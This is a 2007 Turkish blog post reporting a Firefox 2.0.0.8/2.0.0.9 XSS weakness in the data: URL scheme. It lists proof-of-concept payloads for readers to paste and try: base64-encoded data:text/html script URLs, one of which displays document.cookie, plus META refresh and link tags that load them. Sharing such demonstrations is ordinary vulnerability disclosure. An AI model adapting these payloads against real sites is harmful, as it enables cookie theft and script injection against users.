Gün geçmiyorki yeni açıklar çıkmasın. Bu seferki açıkta Firefox’ta bulundu. 2.0.0.8 versiyonu geçtiğimiz haftalarda çıkmasına rağmen, kısa sürede yeni açıklar tespit edildi. Ayrıca 1 Kasım da çıkan 2.0.0.9 versiyonunda da bu açığın bulunduğu gözlendi. Firefox üzerinde XSS kodlarını rahatça çalıştırabilmek ve data url scheme açığını kullanabilmek mümkün. Bu açığı test edebilmeniz için altta bazı örnek kodlar paylaştım. XSS kodunuzu bu adresten base64 koduna çevirip alttaki gibi adres çubuğunda deneyebilirsiniz Firefox’un yeni sürümü yakın zamanda çıkabilir.

Alttaki kodları Firefox’un adres çubuğuna yapıştırıp deneyebilirsiniz.


CODE:

  1. (<script>alert(1);</script> base64‘e çevirilmiş hali altta. Adres çubuğuna yapıştırıp deneyebilirsiniz.)

  2. data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTs8L3NjcmlwdD4=

  4. (<script>alert(document.cookie)</script> base64′e çevirilmiş hali altta. Adres çubuğuna yapıştırıp deneyebilirsiniz.)

  5. data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ+

  7. <META http-equiv=“refresh” content=“5;URL=data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTs8L3NjcmlwdD4=”>

  9. data:text/html,<script>alert(1)</script>

  11. data:text/cmd;,test

Veya alttaki kodları html olarak kaydedip te denemeniz mümkün.


CODE:

  1. <a href=“data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTs8L3NjcmlwdD4=”>XSS</a>

  3. <META http-equiv=“refresh” content=“3;URL=data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTs8L3NjcmlwdD4=”>

Kaynak: eno7 | http://eno7.org

Bu ve benzeri yazılarımızı, anlık takip etmek için RSS Besleme`mize abone olunuz. Teşekkürler!

Ekleyen: Cumhur İlyasoğlu Tarih: Kasım 3rd, 2007 | Bağlı Kategori: Açıklar | -